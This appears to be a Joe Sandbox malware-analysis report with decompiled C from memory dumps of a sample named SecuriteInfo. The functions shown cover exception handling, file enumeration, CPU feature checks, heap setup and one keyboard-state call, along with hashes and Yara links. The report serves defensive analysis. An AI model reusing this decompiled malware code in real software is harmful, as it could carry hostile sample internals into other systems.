Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d711610cdacf88c6f7dc8e336584b079830f0fe6d76d58c267b8632e84c4b949
Instruction ID: ff4f4bf6eb1e3f12f5ca2711bc96063350614a8301f77a4cd8540aa25ce58739
Opcode Fuzzy Hash: d711610cdacf88c6f7dc8e336584b079830f0fe6d76d58c267b8632e84c4b949
Instruction Fuzzy Hash: CC31D27594122CABCB21DF64D889BCCBBB8FF18310F5041EAE41DA6251EB709B818F44

Uniqueness

Uniqueness Score: -1.00%

Function 001BA9AA Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E001BA9AA(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E001B861B(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E001B85E0(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x001ba9b8
0x001ba9bf
0x001ba9c4
0x001ba9ca
0x001ba9cd
0x001ba9d3
0x001ba9d8
0x001ba9dd
0x001ba9dd
0x001ba9e3
0x001ba9e8
0x001ba9ed
0x001ba9ed
0x001ba9f4
0x001ba9f9
0x001ba9fe
0x001ba9fe
0x001baa05
0x001baa0a
0x001baa0f
0x001baa0f
0x001baa16
0x001baa1b
0x001baa20
0x001baa20
0x001baa28
0x001baa38
0x001baa4a
0x001baa5c
0x001baa6f
0x001baa81
0x001baa89
0x001baa8e
0x001baa93
0x001baa93
0x001baa9a
0x001baa9f
0x001baa9f
0x001baaa6
0x001baaab
0x001baaab
0x001baab2
0x001baab7
0x001baab7
0x001baabe
0x001baac3
0x001baac3
0x001baacd
0x001baacf
0x001bab09
0x001baad1
0x001baad6
0x001baafa
0x001bab02
0x001baaf6
0x001baaf6
0x001bab0c
0x001bab13
0x001bab15
0x001bab37
0x001bab3f
0x001bab42
0x001bab42
0x001bab44
0x001bab44
0x001bab4f
0x001bab55
0x001bab5a
0x001bab61
0x001bab9b
0x001baba6
0x001babac
0x001babaf
0x001babb2
0x001babbe
0x001babc6
0x001bab63
0x001bab66
0x001bab72
0x001bab78
0x001bab7e
0x001bab81
0x001bab8a
0x001bab8a
0x001babc9
0x001babd7
0x001babdd
0x001babe0
0x001babe5
0x001babe7
0x001babea
0x001babea
0x001babef
0x001babf1
0x001babf4
0x001babf4
0x001babf9
0x001babfb
0x001babfe
0x001babfe
0x001bac03
0x001bac05
0x001bac08
0x001bac08
0x001bac0d
0x001bac0f
0x001bac0f
0x001bac1c
0x001bac1f
0x001bac56
0x001bac21
0x001bac21
0x001bac24
0x001bac4f
0x001bac44
0x001bac44
0x001bac58
0x001bac60
0x001bac63
0x001bac82
0x001bac87
0x001bac87
0x001bac89
0x001bac8e
0x001bac9a
0x001bac90
0x001bac93
0x001bac93
0x001bac9f
0x001bac9f
0x001bac65
0x001bac68
0x001bac77
0x00000000
0x001bac77
0x001bac6a
0x001bac6d
0x001bac6f
0x001bac6f
0x00000000
0x001bac6d
0x001bac26
0x001bac29
0x001bac3f
0x00000000
0x001bac3f
0x001bac2e
0x001bac30
0x001bac30
0x001bac2e
0x00000000
0x001bac1f
0x001bab1c
0x001bab2a
0x001bab32
0x00000000
0x001bab32
0x001bab20
0x001bab25
0x001bab25
0x00000000
0x001bab20
0x001baadd
0x001baaeb
0x001baaf3
0x00000000
0x001baaf3
0x001baae1
0x001baae6
0x001baae6
0x001baae1

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001BA905,?,?,00000008,?,?,001BA4E0,00000000), ref: 001BABD7

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 937e3de46afbe7c802c0e6f001d03067f91b5f16e88716f4309c27051adddfc1
Instruction ID: 482e470778e73fa416934c3adce0729de52e7ba1997c4f9be5eb4874895f8790
Opcode Fuzzy Hash: 937e3de46afbe7c802c0e6f001d03067f91b5f16e88716f4309c27051adddfc1
Instruction Fuzzy Hash: 85B17C31210608CFD719CF28C586BA47BE1FF45364F698658E8DACF2A1C335E991CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001B5293 Relevance: 1.7, APIs: 1, Instructions: 158
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E001B5293(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char* _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				signed int _v612;
				signed int _v616;
				intOrPtr _v620;
				char* _v648;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				void* _t49;
				signed int _t52;
				signed char _t54;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				int _t70;
				void* _t84;
				void* _t86;
				void* _t90;
				union _FINDEX_INFO_LEVELS _t91;
				signed int* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t97;
				intOrPtr _t100;
				void* _t102;
				char* _t103;
				void* _t111;
				signed int _t116;
				WCHAR* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;
				void* _t129;
				signed int _t130;
				void* _t131;

				_push(__ecx);
				_t97 = _a4;
				_t111 = _t97 + 2;
				do {
					_t44 =  *_t97;
					_t97 = _t97 + 2;
				} while (_t44 != 0);
				_t116 = _a12;
				_t100 = (_t97 - _t111 >> 1) + 1;
				_v8 = _t100;
				if(_t100 <=  !_t116) {
					_t90 = _t116 + 1 + _t100;
					_t122 = E001B4871(_t90, 2);
					_t102 = _t121;
					if(_t116 == 0) {
						L7:
						_push(_v8);
						_t90 = _t90 - _t116;
						_t49 = E001B4980(_t102, _t122 + _t116 * 2, _t90, _a4);
						_t130 = _t129 + 0x10;
						if(_t49 != 0) {
							goto L12;
						} else {
							_t119 = _a16;
							_t94 = E001B520C(_t119);
							if(_t94 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t119 + 4)))) = _t122;
								 *((intOrPtr*)(_t119 + 4)) =  *((intOrPtr*)(_t119 + 4)) + 4;
								_t94 = 0;
							} else {
								E001B36C3(_t122);
							}
							E001B36C3(0);
							_t84 = _t94;
							goto L4;
						}
					} else {
						_push(_t116);
						_t86 = E001B4980(_t102, _t122, _t90, _a8);
						_t130 = _t129 + 0x10;
						if(_t86 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E001B37A6();
							asm("int3");
							_t128 = _t130;
							_t131 = _t130 - 0x264;
							_t52 =  *0x1c4050; // 0x33da424a
							_v48 = _t52 ^ _t130;
							_t112 = _v32;
							_t103 = _v28;
							_push(_t90);
							_push(_t122);
							_push(_t116);
							_t117 = _v36;
							_v648 = _t103;
							if(_t112 != _t117) {
								while(E001B54BD( *_t112 & 0x0000ffff) == 0) {
									_t112 = _t112 - 2;
									if(_t112 != _t117) {
										continue;
									}
									break;
								}
								_t103 = _v612;
							}
							_t123 =  *_t112 & 0x0000ffff;
							if(( *_t112 & 0x0000ffff) != 0x3a) {
								L21:
								_t103 =  &_v605;
								_t54 = E001B54BD(_t123);
								_t112 = (_t112 - _t117 >> 1) + 1;
								asm("sbb eax, eax");
								_t91 = 0;
								_v616 =  ~(_t54 & 0x000000ff) & _t112;
								_t124 = FindFirstFileExW(_t117, 0,  &_v604, 0, 0, 0);
								if(_t124 != 0xffffffff) {
									_t92 = _v612;
									_v612 = _t92[1] -  *_t92 >> 2;
									_t63 = 0x2e;
									do {
										if(_v604.cFileName != _t63 || _v558 != 0 && (_v558 != _t63 || _v556 != 0)) {
											_push(_t92);
											_t65 = E001B5293(_t103,  &(_v604.cFileName), _t117, _v616);
											_t131 = _t131 + 0x10;
											_v620 = _t65;
											if(_t65 != 0) {
												FindClose(_t124);
												_t67 = _v620;
											} else {
												goto L29;
											}
										} else {
											goto L29;
										}
										goto L34;
										L29:
										_t70 = FindNextFileW(_t124,  &_v604);
										_t63 = 0x2e;
									} while (_t70 != 0);
									_t112 =  *_t92;
									_t106 = _v612;
									_t73 = _t92[1] -  *_t92 >> 2;
									if(_v612 != _t92[1] -  *_t92 >> 2) {
										E001B80B0(_t112, _t112 + _t106 * 4, _t73 - _t106, 4, E001B54E1);
									}
									FindClose(_t124);
									_t67 = 0;
								} else {
									_push(_v612);
									goto L20;
								}
							} else {
								_t22 =  &(_t117[1]); // 0x2
								if(_t112 == _t22) {
									goto L21;
								} else {
									_push(_t103);
									_t91 = 0;
									L20:
									_t67 = E001B5293(_t103, _t117, _t91, _t91);
								}
							}
							L34:
							_pop(_t118);
							_pop(_t125);
							_pop(_t93);
							return E001ADB25(_t67, _t93, _v12 ^ _t128, _t112, _t118, _t125);
						} else {
							goto L7;
						}
					}
				} else {
					_t84 = 0xc;
					L4:
					return _t84;
				}
			}

0x001b5298
0x001b5299
0x001b52a0
0x001b52a3
0x001b52a3
0x001b52a6
0x001b52a9
0x001b52ae
0x001b52b7
0x001b52ba
0x001b52bf
0x001b52cc
0x001b52d6
0x001b52d9
0x001b52dc
0x001b52f0
0x001b52f0
0x001b52f3
0x001b52fd
0x001b5302
0x001b5307
0x00000000
0x001b5309
0x001b5309
0x001b5313
0x001b5317
0x001b5325
0x001b5327
0x001b532b
0x001b5319
0x001b531a
0x001b531f
0x001b532f
0x001b5335
0x00000000
0x001b5337
0x001b52de
0x001b52de
0x001b52e4
0x001b52e9
0x001b52ee
0x001b533a
0x001b533c
0x001b533d
0x001b533e
0x001b533f
0x001b5340
0x001b5341
0x001b5346
0x001b534a
0x001b534c
0x001b5352
0x001b5359
0x001b535c
0x001b535f
0x001b5362
0x001b5363
0x001b5364
0x001b5365
0x001b5368
0x001b5370
0x001b5372
0x001b5385
0x001b538a
0x00000000
0x00000000
0x00000000
0x001b538a
0x001b538c
0x001b538c
0x001b5392
0x001b5398
0x001b53b4
0x001b53b5
0x001b53bb
0x001b53c7
0x001b53ca
0x001b53cc
0x001b53d3
0x001b53e8
0x001b53ed
0x001b53f7
0x001b5407
0x001b540d
0x001b540e
0x001b5415
0x001b5434
0x001b5443
0x001b5448
0x001b544b
0x001b5453
0x001b54a2
0x001b54a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001b5455
0x001b545d
0x001b5467
0x001b5467
0x001b546d
0x001b5471
0x001b5477
0x001b547c
0x001b5497
0x001b549c
0x001b547f
0x001b5485
0x001b53ef
0x001b53ef
0x00000000
0x001b53ef
0x001b539a
0x001b539a
0x001b539f
0x00000000
0x001b53a1
0x001b53a1
0x001b53a2
0x001b53a4
0x001b53a7
0x001b53ac
0x001b539f
0x001b54ae
0x001b54b1
0x001b54b2
0x001b54b5
0x001b54bc
0x00000000
0x00000000
0x00000000
0x001b52ee
0x001b52c1
0x001b52c3
0x001b52c4
0x001b52c7
0x001b52c7

APIs

Part of subcall function 001B4871: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001B278A,00000001,00000364,00000000,00000007,000000FF,?,?,001B47E9,001B36F8), ref: 001B48B2

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B53E2
FindNextFileW.KERNEL32(00000000,?), ref: 001B545D
FindClose.KERNEL32(00000000), ref: 001B547F

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Find$File$AllocateCloseFirstHeapNext
String ID:
API String ID: 2963102669-0
Opcode ID: 04f1538bfe1691fd5d9a280a14cabe98eb25b6de531da95fd037b4305acebd24
Instruction ID: 2fbccd032348f1c7a38bf63a595ddec13e865b1119f00ca927515a7bf169b3c8
Opcode Fuzzy Hash: 04f1538bfe1691fd5d9a280a14cabe98eb25b6de531da95fd037b4305acebd24
Instruction Fuzzy Hash: 6D410B72600A09AFDB14AFA8DC85FFFB3ABEF94354F144159F81697241EB709D008650

Uniqueness

Uniqueness Score: -1.00%

Function 001AD945 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E001AD945(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x1c5aa0 =  *0x1c5aa0 & 0x00000000;
				 *0x1c4058 =  *0x1c4058 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x1c5aa4; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x1c5aa4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x1c4058; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x1c5aa0 = 1;
					 *0x1c4058 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x1c5aa0 = 2;
						 *0x1c4058 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x1c4058; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x1c5aa0 = 3;
								 *0x1c4058 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x1c5aa0 = 5;
									 *0x1c4058 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x1c4058 =  *0x1c4058 | 0x00000040;
										 *0x1c5aa0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x1c5aa4; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x1c5aa4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x001ad945
0x001ad948
0x001ad952
0x001ad963
0x001adb15
0x001adb18
0x001adb18
0x001ad969
0x001ad96f
0x001ad974
0x001ad978
0x001ad97c
0x001ad97e
0x001ad980
0x001ad983
0x001ad988
0x001ad991
0x001ad9a2
0x001ad9ad
0x001ad9b3
0x001ad9b4
0x001ad9ba
0x001ad9bd
0x001ad9c7
0x001ad9ca
0x001ad9cd
0x001ad9d0
0x001ada15
0x001ada15
0x001ada1b
0x001ada1b
0x001ada20
0x001ada21
0x001ada27
0x001ada59
0x001ada29
0x001ada2b
0x001ada2c
0x001ada32
0x001ada35
0x001ada37
0x001ada3a
0x001ada3d
0x001ada40
0x001ada43
0x001ada4c
0x001ada51
0x001ada51
0x001ada4c
0x001ada5c
0x001ada61
0x001ada64
0x001ada6e
0x001ada79
0x001ada7f
0x001ada82
0x001ada8c
0x001ada97
0x001adaa3
0x001adaa6
0x001adaa9
0x001adab4
0x001adab9
0x001adabb
0x001adac0
0x001adac3
0x001adacd
0x001adad5
0x001adada
0x001adae4
0x001adaf2
0x001adb05
0x001adb0c
0x001adb0c
0x001adaf2
0x001adad5
0x001adab9
0x001ada97
0x00000000
0x001adb14
0x001ad9d5
0x001ad9df
0x001ada04
0x001ada0a
0x001ada0d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001AD95B

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5d2a01c0e4107a72b5d30457386b4c40988fa1045f42c882e9c927bab2e4482f
Instruction ID: c7e4921454e38c1496c52337b27b76055855d0bc7e421996745efe15dc640d1a
Opcode Fuzzy Hash: 5d2a01c0e4107a72b5d30457386b4c40988fa1045f42c882e9c927bab2e4482f
Instruction Fuzzy Hash: C2519475A04A058FDB14CF65E8C6BAABBF1FB45310F258129E416EBA50D374ED90CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001AB830 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 001AB846

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: KeyboardState
String ID:
API String ID: 1724228437-0
Opcode ID: 5735bac817b401af96b779d19eb6c268aee1ca7e52a60b009da0257292257a3f
Instruction ID: 8cfa2a5e12be504cc2b316ab260ddb3ba3c92ab8979b85d1ec4b9436bab9e7fc
Opcode Fuzzy Hash: 5735bac817b401af96b779d19eb6c268aee1ca7e52a60b009da0257292257a3f
Instruction Fuzzy Hash: 9131AA75A14248AFEB51CFA8C596BAD7BF0FB01311F1844A1E4D4DB292C338DB90DB51

Uniqueness

Uniqueness Score: -1.00%

Function 001B258B Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B258B() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x1c62dc = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x001b258b
0x001b2593
0x001b259b

APIs

GetProcessHeap.KERNEL32 ref: 001B258B

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: fe429d73a1766d118c9d258ea33ba8a83b55d005c1360f1cfb01d1641427dfdd
Instruction ID: 2cfd7e43f5e6a1b060a29ef0d934c00b0ea02ddd39927653697a738e4699ed8d
Opcode Fuzzy Hash: fe429d73a1766d118c9d258ea33ba8a83b55d005c1360f1cfb01d1641427dfdd
Instruction Fuzzy Hash: 97A011302022008F83008F32AA08A083EA8AB82280B088828A002C8820EA20C0E0EF02

Uniqueness

Uniqueness Score: -1.00%

Function 001B418D Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001B418D(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E001B2329(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x001b419a
0x001b419c
0x001b419f
0x001b41a2
0x001b41a5
0x001b41b6
0x001b41b8
0x001b41a7
